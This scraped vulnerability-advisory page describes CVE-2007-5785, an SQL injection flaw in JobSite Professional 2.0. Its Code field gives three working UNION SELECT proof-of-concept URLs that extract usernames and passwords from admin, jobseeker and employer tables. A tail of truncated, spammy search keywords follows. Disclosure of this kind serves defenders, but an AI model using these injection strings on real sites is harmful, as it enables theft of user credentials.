exploits , vulnerabilities , articles , JobSite Professional File.PHP SQL injection Vulnerability

Title	JobSite Professional File.PHP SQL injection Vulnerability
Published	2007-10-29-12:00AM
Updated	2007-11-15-12:40AM
Class	Input Validation Error
CVE	CVE-2007-5785
Remote	Yes
Local	No
Credit	ZynbER is credited with the discovery of this vulnerability.
Vulnerable	NetArt Media JobSite Professional 2.0
Not Vulnerable
Code	Attackers can use a browser to exploit this issue.The following proof-of-concept URIs are available:http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_admin_users/* http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_jobseekers/* http://www.example.com.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+www.example.comadmin_ext_employers/*
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 00:06:50 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo w.w.tagtag wwwxxnx;co xxltv P...e($ddd 1.3.1 www.xianba metaframe Pindi www.zhibob sex in fir MERS PHP Advanc Ayu Ajhari w.w.tagtag 191web.com Www.Hotgir abnoplasti Subscribe www.baidu1 SAXI.FILM Jenna jama HOD Www.sex700 Pmb result CMS is Fre chelsea ra news for c exploits%2 search/exp Mikro+Tik goo www.mir166 SUNrpc vediosexy modules/li xayf.com.c ASIANSEXVI Piryanka.c MyBB news for c 200 /compo Mujra www.5297k. 200 /compo news for c www.sextoo bolywood g Sex.Free rion